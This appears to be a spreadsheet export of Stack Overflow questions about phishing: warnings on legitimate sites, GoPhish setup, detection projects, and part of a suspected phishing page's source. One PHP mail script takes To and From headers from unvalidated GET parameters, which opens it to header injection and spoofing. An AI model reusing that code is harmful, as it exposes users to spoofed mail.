 &lt;p&gt;Is there any way that I can get the score to update with the number of points gained in each game, rather than overwritten each time? &lt;/p&gt;
 &lt;p&gt;Below is the code for a quiz game, after hitting submit the score is saved in the database. If the user logs out and plays again and scores 3, I would like the current score in the database to increase by 3, rather than overwrite and become 3&lt;/p&gt;
 &lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false"&gt;
 &lt;div class="snippet-code"&gt;
 &lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;package com.example.securityapp;
 import androidx.appcompat.app.AppCompatActivity;
 import android.content.Intent;
 import android.os.Bundle;
 import android.content.Context;
 import android.view.View;
 import android.widget.Button;
 import android.widget.CheckBox;
 import android.widget.ProgressBar;
 import android.widget.Toast;
 import com.google.firebase.auth.FirebaseAuth;
 import com.google.firebase.auth.FirebaseUser;
 import com.google.firebase.database.DatabaseReference;
 import com.google.firebase.database.FirebaseDatabase;
 public class phishing_questions extends AppCompatActivity {
  CheckBox financial, kindness, humour, postal, virtual, electronic, grammar, urgency, accuracy, highLevel, lowLevel, all, email, text, coldcall;
  Button score, finished;
  ProgressBar questionProgress;
  DatabaseReference databaseUsers;
  FirebaseDatabase database = FirebaseDatabase.getInstance();
  FirebaseAuth mAuth;
  int grade = 0;
  int progress = 0;
  @Override
  protected void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.activity_phishing_questions);
  questionProgress = (ProgressBar) findViewById(R.id.progress_bar);
  questionProgress.setMax(5);
  questionProgress.setProgress(0);
  final Context currentContext = this;
  finished = (Button) findViewById(R.id.finish);
  score = (Button) findViewById(R.id.final_score);
  databaseUsers = database.getReference();
  mAuth = FirebaseAuth.getInstance();
  FirebaseUser user = mAuth.getCurrentUser();
  score.setOnClickListener(new View.OnClickListener() {
  @Override
  public void onClick(View v) {
  if (financial.isChecked()) grade++;
  if (electronic.isChecked()) grade++;
  if (urgency.isChecked()) grade++;
  if (highLevel.isChecked()) grade++;
  if (text.isChecked()) grade++;
  Users.currentUser.setScore(grade);
  databaseUsers.child(Users.currentUserId).setValue(Users.currentUser);
  Toast.makeText(currentContext, "You scored " + grade + " points!", Toast.LENGTH_LONG).show();
  grade = 0;
  }
  });
  financial = (CheckBox) findViewById(R.id.financial_gain_checkbox);
  kindness = (CheckBox) findViewById(R.id.kindness_checkbox);
  humour = (CheckBox) findViewById(R.id.humour_checkbox);
  postal = (CheckBox) findViewById(R.id.postal_checkbox);
  virtual = (CheckBox) findViewById(R.id.virtual_checkbox);
  electronic = (CheckBox) findViewById(R.id.electronic_checkbox);
  grammar = (CheckBox) findViewById(R.id.good_grammar_checkbox);
  urgency = (CheckBox) findViewById(R.id.urgency_checkbox);
  accuracy = (CheckBox) findViewById(R.id.accuracy_checkbox);
  highLevel = (CheckBox) findViewById(R.id.high_level_checkbox);
  lowLevel = (CheckBox) findViewById(R.id.low_level_checkbox);
  all = (CheckBox) findViewById(R.id.all_employees_checkbox);
  email = (CheckBox) findViewById(R.id.via_email_checkbox);
  text = (CheckBox) findViewById(R.id.via_text_checkbox);
  coldcall = (CheckBox) findViewById(R.id.via_coldcalls_checkbox);
  }
  public void questionOneProgress() {
  if (financial.isChecked()) questionProgress.setProgress(progress++);
  else if (kindness.isChecked()) questionProgress.setProgress(progress++);
  else if (humour.isChecked()) questionProgress.setProgress(progress++);
  }
  public void FinishedOnClick (View view)
  {
  finished.setOnClickListener(new View.OnClickListener()
  {
  @Override
  public void onClick(View v)
  {
  Intent intent_finished = new Intent(phishing_questions.this, rating.class);
  startActivity(intent_finished);
  finish();
  }
  });
  }
 }&lt;/code&gt;&lt;/pre&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;android&gt;</t>
  </si>
  <si>
    <t>My site flagged as unsafe by Smartscreen only in Microsoft Edge</t>
  </si>
  <si>
    <t>&lt;p&gt;My Magento 1.9 webshop is marked as unsafe (phishing which is not true) in Microsoft Edge, if switch to IE and run Smart Screen security check it says all safe. 
 And strangely only on one of my computers and therefore didn't bother much but also a customer complained about it today. &lt;/p&gt;
 &lt;p&gt;Anyone experienced this before and have a solution? Is there a way to check why a site is marked as unsafe by smartscreen?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;magento-1.9&gt;&lt;microsoft-edge&gt;&lt;phishing&gt;&lt;smartscreen&gt;</t>
  </si>
  <si>
    <t>import error: &lt;module 'main' from 'C:\Users\Anjali\Desktop\malbee-phish\main.py'&gt; has no attribute app</t>
  </si>
  <si>
    <t>&lt;p&gt;i converted my code from python 2.5 to 2.7 following the tutorials available but I'm encountering many errors as can be seen in this log file that was generated when i run the code. Please help me resolve these errors&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; File "C:\Program Files\Google\google_appengine\google\appengine\runtime\wsgi.py", line 269, in _LoadHandler
  raise ImportError('%s has no attribute %s' % (handler, name))
 ImportError: &amp;lt;module 'main' from 'C:\Users\Anjali\Desktop\malbee-phish\main.py'&amp;gt; has no attribute app
 BadStatusLine("''",)
 BadStatusLine("''",)
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;google-app-engine&gt;</t>
  </si>
  <si>
    <t>SSL, EV SSL, And URL Rewriting</t>
  </si>
  <si>
    <t>&lt;p&gt;We extensively use a third party app that we'll call thirdparty.com. thirdparty.com and mysite.com have a common navigation and look and feel, so to the users, they think they are always on mysite.com.&lt;/p&gt;
 &lt;p&gt;What we're going to do is start url rewriting 3rd.mysite.com to display thirdparty.com, to make it look even more like a seamless experience. This also gives us access to thirdparty.com's cookie, because it will be written as mysite.com.&lt;/p&gt;
 &lt;p&gt;thirdparty.com has an SSL cert that they use for a few select transactions (basically just login). When you call &lt;a href="https://3rd.mysite.com/login" rel="nofollow noreferrer"&gt;https://3rd.mysite.com/login&lt;/a&gt;, you get a 404 as mysite.com does not have SSL. So we're going to install an SSL cert to the 3rd.mysite.com subdomain to alleviate this problem.&lt;/p&gt;
 &lt;p&gt;The question is, if we install a EV SSL certificate, will the user see that, or will it relegate to the cert from thirdparty.com? I can think of reasons for this to work both ways, but am looking for a definitive answer. If they see the SSL cert, then there's no sense wasting money on the EVSSL. If they see the EVSSL, I'd think that would be a big opening for phishing if someone was doing this illegitimately.&lt;/p&gt;
 &lt;p&gt;Cheers&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;apache&gt;&lt;ssl&gt;&lt;url-rewriting&gt;&lt;ssl-certificate&gt;</t>
  </si>
  <si>
    <t>selenium logging into tomcat manager</t>
  </si>
  <si>
    <t>&lt;p&gt;How do I handle the popup requesting details when going to localhost:8080/manager for tomcat?&lt;/p&gt;
 &lt;p&gt;I cannot see how tos witch to the window to type the user pass.&lt;/p&gt;
 &lt;p&gt;Ive tried using the autoauth plugin, whit no luck&lt;/p&gt;
 &lt;p&gt;I've tried &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;"driver.get("http://user:pass@localhost:8080/manager)"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I'm totally stuck!&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;@Before
 public void setUp() throws Exception {
  FirefoxProfile ffProfile = new FirefoxProfile();
  ffProfile.setPreference("network.http.phishy-userpass-length", 255);
  driver = new FirefoxDriver(ffProfile);
  driver.manage().timeouts().implicitlyWait(30, TimeUnit.SECONDS);
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This is how I'm currently setting up my webdriver.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;selenium&gt;</t>
  </si>
  <si>
    <t>Phishing attack Azure Website</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a website published in Azure(Not Free). Which was working just fine but sometimes ago I just got "Phishing attack ahead Attackers on example.com might try to trick you to steal your information (for example, passwords, messages, or credit cards) in chrome and Mozilla as well. can you guys tell me what's the issue? and why the message is coming?
 Please note that the website is working locally. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;asp.net&gt;&lt;asp.net-mvc&gt;&lt;azure&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is an overlay more susceptible to phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;Working on a web development project, functionality requires a user to navigate through the website then login and perform a very sensitive function. The login and subsequent functionality is hosted on a different site (sorry I can'be be more specific due to sensitivity)&lt;/p&gt;
 &lt;p&gt;Choices considered for the UI are:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;A javascript overlay&lt;/li&gt;
 &lt;li&gt;A popup&lt;/li&gt;
 &lt;li&gt;Load in the full page&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The current development and prototype user testing has been on an overlay with no problems. There is concern that an overlay does not show the address bar and the SSL certificate therefore is more susceptible to phishing.&lt;/p&gt;
 &lt;p&gt;A popup or a full page would be better in this respect but I have read studies that show users do not pay attention to passive indicators:
 &lt;a href="http://www.usablesecurity.org/emperor/" rel="nofollow"&gt;http://www.usablesecurity.org/emperor/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Popups also have the problem with popup blockers, the overlay looks the best and provides the least disruptive user experience, i.e. user feels they have not left the original site&lt;/p&gt;
 &lt;p&gt;So what is the best option considering security, usability and design?&lt;/p&gt;
 &lt;p&gt;Related question: is there any problems with loading an iframe within an overlay? e.g. scrollbars etc?&lt;/p&gt;
 &lt;p&gt;Edit: The question is more how to present the secure login page on an overlay, a popup or redirect to load the login in the full page. I'll edit the question to make this clear&lt;/p&gt;
 &lt;p&gt;Edit: Any links to research or studies showing increased phishing if an overlay is used would be very useful for making the case&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;overlay&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>possible to change To: field in email header?</t>
  </si>
  <si>
    <t>&lt;p&gt;I found a phishing email in my inbox that has my email address in the From: field, and an unknown email address in the To: field. It was made like I had sent the email to the unknown email address.&lt;/p&gt;
 &lt;p&gt;I'd like to ask if it is possible to change the To: field in the email header?
 (I know it's possible to change the From: field in email)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;email&gt;&lt;sendmail&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Microsoft Graph: How to report phishing to tenant admin</t>
  </si>
  <si>
    <t>&lt;p&gt;I would like to use the Microsoft Graph to report suspicious emails on behalf of a user. Precisely, the reports should end up in the &lt;a href="https://security.microsoft.com/reportsubmission?viewid=user" rel="nofollow noreferrer"&gt;User reported messages&lt;/a&gt; view in Microsoft Defender.&lt;/p&gt;
 &lt;p&gt;I know I can create &lt;a href="https://learn.microsoft.com/en-us/graph/api/resources/threatassessment-api-overview?view=graph-rest-1.0" rel="nofollow noreferrer"&gt;Threat Assessment Request&lt;/a&gt;, but that sends the report directly to Microsoft, i.e. reports end up in the &lt;a href="https://security.microsoft.com/reportsubmission?viewid=admin" rel="nofollow noreferrer"&gt;Submitted for analysis&lt;/a&gt; view. I want to let the tenant admin decide whether to send to Microsoft or not.&lt;/p&gt;
 &lt;p&gt;In other words, I would like to implement the same feature as this button in Outlook:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/7BjPA.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/7BjPA.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;How can I achieve this using the Microsoft Graph, or another Microsoft endpoint ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;microsoft-graph-api&gt;&lt;office365&gt;&lt;outlook-addin&gt;&lt;microsoft-graph-mail&gt;&lt;office365-rest-client&gt;</t>
  </si>
  <si>
    <t>How to report phishing on Firebase.com</t>
  </si>
  <si>
    <t>&lt;p&gt;We've received quite a number of phishing attempts that using firebase.com as a landing site. I cannot find any link to report such cases. Does anyone know how to report phishing on firebase.com?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firebase&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Gmail considering my email as phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I send an email to my customers with a receipt. I am using my server to send this email from my business email @gmail.com and it contains a link to the receipt image on my server. However, gmail labels it as possibly phishing, specifically that it is not from my business email address. What can I do to stop it from claiming it as phishing?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
  $mifb = $_GET["mifb"]; //link to the receipt pic on my server
  $tpppp = $_GET["tpppp"]; //customer email
  $fyppp = $_GET["fyppp"]; //my business email @gmail.com
 $headers = 'MIME-Version: 1.0' . "\r\n";
 $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
 $headers .= 'To: &amp;lt;'. $tpppp.'&amp;gt;' . "\r\n";
 $headers .= 'From: &amp;lt;'. $fyppp.'&amp;gt;' . "\r\n";
 $message = '&amp;lt;!DOCTYPE html&amp;gt;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;a href="http://www.mybusinesswebsite.com"&amp;gt;&amp;lt;img src= '.$mifb.'&amp;gt;&amp;lt;/a&amp;gt;The receipt is in an image format&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;';
 mail($tpppp, 'For Customer George Walters', $message, $headers);
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>user1667601</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;html&gt;&lt;email&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Any way to Invoke Matlab to compute picture similarity?</t>
  </si>
  <si>
    <t>&lt;p&gt;We are working on our project which involves implementing Neural Network to detect Phishing &lt;/p&gt;
 &lt;p&gt;Currently , we are planning to use the URL and a Screenshot of the website opened in the Browser and pass it as a string &amp;amp; JPEG file to a program . We want this program to invoke Matlab and search &lt;/p&gt;
 &lt;p&gt;a) similar image in our Whitelisted Website image databases .
 b) Similar URL in our Blacklisted Website databases obtained in an XML file &lt;/p&gt;
 &lt;p&gt;we will compute a score based on these evaluations and assign a phishing rating to the website .&lt;/p&gt;
 &lt;p&gt;We are in initial stages , so just wanted to know if this is at all feasible ? 
 Help is appreciated :)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;matlab&gt;&lt;neural-network&gt;</t>
  </si>
  <si>
    <t>Publishing status rejected on playstore. Eligibility Issue. App does not meet the anti-SMS phishing use case criteria</t>
  </si>
  <si>
    <t>&lt;p&gt;After rollout, My apps has been rejected, and I got email from google PlayStore support. But I still not get a hint.&lt;/p&gt;
 &lt;p&gt;here is the message:
 &lt;a href="https://i.stack.imgur.com/oi4tI.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/oi4tI.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-play&gt;</t>
  </si>
  <si>
    <t>GoPhish Docker : no valid version found</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm running GoPhish with below docker command:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;docker run -v $PWD/:/opt/gophish/db -p 3333:3333 -p 80:80 gophish/gophish 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;But getting below error:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;time=&amp;quot;2021-03-22T22:01:24Z&amp;quot; level=error msg=&amp;quot;no valid version found&amp;quot;
 time=&amp;quot;2021-03-22T22:01:24Z&amp;quot; level=fatal msg=&amp;quot;no valid version found&amp;quot;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Detail logs:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Runtime configuration: 
 {
  &amp;quot;admin_server&amp;quot;: {
  &amp;quot;listen_url&amp;quot;: &amp;quot;0.0.0.0:3333&amp;quot;,
  &amp;quot;use_tls&amp;quot;: true,
  &amp;quot;cert_path&amp;quot;: &amp;quot;gophish_admin.crt&amp;quot;,
  &amp;quot;key_path&amp;quot;: &amp;quot;gophish_admin.key&amp;quot;
  },
  &amp;quot;phish_server&amp;quot;: {
  &amp;quot;listen_url&amp;quot;: &amp;quot;0.0.0.0:80&amp;quot;,
  &amp;quot;use_tls&amp;quot;: false,
  &amp;quot;cert_path&amp;quot;: &amp;quot;example.crt&amp;quot;,
  &amp;quot;key_path&amp;quot;: &amp;quot;example.key&amp;quot;
  },
  &amp;quot;db_name&amp;quot;: &amp;quot;sqlite3&amp;quot;,
  &amp;quot;db_path&amp;quot;: &amp;quot;gophish.db&amp;quot;,
  &amp;quot;migrations_prefix&amp;quot;: &amp;quot;db/db_&amp;quot;,
  &amp;quot;contact_address&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;logging&amp;quot;: {
  &amp;quot;filename&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;level&amp;quot;: &amp;quot;&amp;quot;
  }
 }
 time=&amp;quot;2021-03-22T22:01:24Z&amp;quot; level=warning msg=&amp;quot;No contact address has been configured.&amp;quot;
 time=&amp;quot;2021-03-22T22:01:24Z&amp;quot; level=warning msg=&amp;quot;Please consider adding a contact_address entry in your config.json&amp;quot;
 time=&amp;quot;2021-03-22T22:01:24Z&amp;quot; level=error msg=&amp;quot;no valid version found&amp;quot;
 time=&amp;quot;2021-03-22T22:01:24Z&amp;quot; level=fatal msg=&amp;quot;no valid version found&amp;quot;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I'm using official GoPhish image from Docker hub, not changing anything.&lt;/p&gt;
 &lt;p&gt;When I run &lt;code&gt;docker run -v $PWD/:/opt/gophish -p 3333:3333 -p 80:80 gophish/gophish&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;its giving other error where container itself is not getting started :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;docker: Error response from daemon: OCI runtime create failed: container_linux.go:370: starting container process caused: exec: &amp;quot;./docker/run.sh&amp;quot;: stat ./docker/run.sh: no such file or directory: unknown.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Not sure what I'm doing wrong, please help&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;docker&gt;&lt;docker-volume&gt;&lt;gophish&gt;</t>
  </si>
  <si>
    <t>GmailApp.sendEmail(...) creates a phishing warning</t>
  </si>
  <si>
    <t>&lt;p&gt;when I use ...&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;GmailApp.sendEmail("test@gmail.com", "Testmail", "some text");
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;all sent emails are marked with a big red phishing warning (steal personal information) in Gmail.&lt;/p&gt;
 &lt;p&gt;Everything is fine with the following line (same without 'G') ...&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;MailApp.sendEmail("test@gmail.com", "Testmail", "some text");
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I tried a lot to get rid of the warning. But even when I remove all modules the warning is still there. Well the warning is obviously a flag in my project which is automatically set/unset when I deploy a new version. &lt;/p&gt;
 &lt;p&gt;The only personal information I am asking for is the users email address. &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Session.getActiveUser().getEmail(); 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The needed scope to access the email address is granted by Google.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Scope: https://www.googleapis.com/auth/userinfo.email 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;But this scope is not listed in my project scopes and in Stackdriver is a warning "no permission to access email address".&lt;/p&gt;
 &lt;p&gt;Any idea how I get rid of this phishing warning? To fix my scopes?&lt;/p&gt;
 &lt;p&gt;Thanks in advance
 Klaus&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-apps-script&gt;&lt;gmail&gt;&lt;google-oauth&gt;&lt;scopes&gt;&lt;gmail-addons&gt;</t>
  </si>
  <si>
    <t>Potential phishing or malicious code on this page?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently received a link to a webpage that was supposed to be a file to review. I became suspicious and used web-sniffer.net to pull the code. It looks to me like it's trying to maliciously get access to Facebook.&lt;/p&gt;
 &lt;p&gt;Does anyone have thoughts on this? Thanks for your help&lt;/p&gt;
 &lt;h1&gt;Code Below -&lt;/h1&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-gb"&amp;gt;&amp;lt;head&amp;gt;
  &amp;lt;title&amp;gt;View Docs Online - The easiest way to view documents online&amp;lt;/title&amp;gt;
  &amp;lt;meta name="description" content="View Docs Online allows you to view the most common document types in a simple and fast way. No need to install any software!"&amp;gt;
  &amp;lt;meta name="keywords" content="view documents online, documents, viewer, remondini, doc, office, pdf, docx, xlsx, pptx, online, docs, view, document, firefox, open"&amp;gt;
  &amp;lt;meta name="author" content="Denis Remondini"&amp;gt;
  &amp;lt;meta name="robots" content="noarchive"&amp;gt;
  &amp;lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&amp;gt;
  &amp;lt;meta property="og:title" content="View Docs Online - The easiest way to view documents online"&amp;gt;
  &amp;lt;meta property="og:type" content="website"&amp;gt;
  &amp;lt;meta property="og:url" content="http://www.viewdocsonline.com"&amp;gt;
  &amp;lt;meta property="og:image" content="http://www.viewdocsonline.com/images/thumbnail_facebook.png"&amp;gt;
  &amp;lt;meta property="og:site_name" content="View Docs Online"&amp;gt;
  &amp;lt;meta property="fb:app_id" content="117978301565673"&amp;gt;
  &amp;lt;link rel="icon" href="http://www.viewdocsonline.com/favicon.ico" type="image/x-icon"&amp;gt;
  &amp;lt;link rel="shortcut icon" href="http://www.viewdocsonline.com/favicon.ico" type="image/x-icon"&amp;gt;
  &amp;lt;link rel="stylesheet" href="View_files/jquery.css" type="text/css" media="print, projection, screen"&amp;gt;
  &amp;lt;link rel="stylesheet" href="View_files/thickbox-3.css" type="text/css" media="screen"&amp;gt; 
  &amp;lt;!-- Additional IE/Win specific style sheet (Conditional Comments) --&amp;gt;
  &amp;lt;!--[if lte IE 7]&amp;gt;
  &amp;lt;link rel="stylesheet" href="/css/jquery.tabs-ie-2.7.4.css" type="text/css" media="projection, screen"&amp;gt;
  &amp;lt;![endif]--&amp;gt;
  &amp;lt;link rel="stylesheet" href="View_files/main-1.css" type="text/css"&amp;gt; 
  &amp;lt;script src="View_files/ga.js" async="" type="text/javascript"&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script type="text/javascript" src="View_files/main-1.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript"&amp;gt;
  $(document).ready(function() {
  $('#tabsSection').tabs({ 
  fxSpeed: 'normal'
  });
  $('#tabsSection').css("display","block");
  });
  &amp;lt;/script&amp;gt;
  &amp;lt;style&amp;gt; 
  &amp;lt;!--
 .button{
  text-decoration:none; 
  text-align:center; 
  padding:11px 32px; 
  border:solid 1px #3866c9; 
  -webkit-border-radius:5px 4px 4px 4px; border-radius: 5px 4px 4px 4px; -moz-border-radius-topleft:5px; -moz-border-radius-topright:4px; -moz-border-radius-bottomleft:4px; -moz-border-radius-bottomright:4px; 
  font:18px Arial, Helvetica, sans-serif; 
  font-weight:bold; 
  color:#E5FFFF; 
  background:#ffffff; 
  -webkit-box-shadow:0px 0px 11px #0d28fa, inset 8px 9px 6px #f5f5f5; 
  -moz-box-shadow: 0px 0px 11px #0d28fa, inset 8px 9px 6px #f5f5f5; 
  box-shadow:0px 0px 11px #0d28fa, inset 8px 9px 6px #f5f5f5; 
  }
  --&amp;gt;
  &amp;lt;/style&amp;gt;
  &amp;lt;script type="text/javascript"&amp;gt;
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-55641-3']);
  _gaq.push(['_setDomainName', 'www.viewdocsonline.com']);
  _gaq.push(['_trackPageview']);
  (function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
 &amp;lt;/script&amp;gt;&amp;lt;style type="text/css"&amp;gt;.fb_hidden{position:absolute;top:-10000px;z-index:10001}
 .fb_invisible{display:none}
 .fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}
 .fb_reset &amp;gt; div{overflow:hidden}
 .fb_link img{border:none}
 .fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}
 .fb_dialog_advanced{padding:10px;-moz-border-radius:8px;-webkit-border-radius:8px;border-radius:8px}
 .fb_dialog_content{background:#fff;color:#333}
 .fb_dialog_close_icon{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;_background-image:url(http://static.ak.fbcdn.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif);cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px;top:8px\9;right:7px\9}
 .fb_dialog_mobile .fb_dialog_close_icon{top:5px;left:5px;right:auto}
 .fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}
 .fb_dialog_close_icon:hover{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent;_background-image:url(http://static.ak.fbcdn.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif)}
 .fb_dialog_close_icon:active{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent;_background-image:url(http://static.ak.fbcdn.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif)}
 .fb_dialog_loader{background-color:#f2f2f2;border:1px solid #606060;font-size:24px;padding:20px}
 .fb_dialog_top_left,
 .fb_dialog_top_right,
 .fb_dialog_bottom_left,
 .fb_dialog_bottom_right{height:10px;width:10px;overflow:hidden;position:absolute}
 .fb_dialog_top_left{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 0;left:-10px;top:-10px}
 .fb_dialog_top_right{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -10px;right:-10px;top:-10px}
 .fb_dialog_bottom_left{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -20px;bottom:-10px;left:-10px}
 .fb_dialog_bottom_right{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -30px;right:-10px;bottom:-10px}
 .fb_dialog_vert_left,
 .fb_dialog_vert_right,
 .fb_dialog_horiz_top,
 .fb_dialog_horiz_bottom{position:absolute;background:#525252;filter:alpha(opacity=70);opacity:.7}
 .fb_dialog_vert_left,
 .fb_dialog_vert_right{width:10px;height:100%}
 .fb_dialog_vert_left{margin-left:-10px}
 .fb_dialog_vert_right{right:0;margin-right:-10px}
 .fb_dialog_horiz_top,
 .fb_dialog_horiz_bottom{width:100%;height:10px}
 .fb_dialog_horiz_top{margin-top:-10px}
 .fb_dialog_horiz_bottom{bottom:0;margin-bottom:-10px}
 .fb_dialog_iframe{line-height:0}
 .fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #3b5998;color:#fff;font-size:14px;font-weight:bold;margin:0}
 .fb_dialog_content .dialog_title &amp;gt; span{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yd/r/Cou7n-nqK52.gif)
 no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}
 body.fb_hidden{-webkit-transform:none;height:100%;margin:0;overflow:visible;position:absolute;top:-10000px;left:0;width:100%}
 .fb_dialog.fb_dialog_mobile.loading{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ya/r/3rhSv5V8j3o.gif)
 white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}
 .fb_dialog.fb_dialog_mobile.loading.centered{max-height:590px;min-height:590px;max-width:500px;min-width:500px}
 #fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .45);position:absolute;left:0;top:0;width:100%;min-height:100%;z-index:10000}
 #fb-root #fb_dialog_ipad_overlay.hidden{display:none}
 .fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}
 .fb_dialog_content .dialog_header{-webkit-box-shadow:white 0 1px 1px -1px inset;background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#738ABA), to(#2C4987));border-bottom:1px solid;border-color:#1d4088;color:#fff;font:14px Helvetica, sans-serif;font-weight:bold;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}
 .fb_dialog_content .dialog_header table{-webkit-font-smoothing:subpixel-antialiased;height:43px;width:100%
 }
 .fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px
 }
 .fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px
 }
 .fb_dialog_content .touchable_button{background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#4966A6),
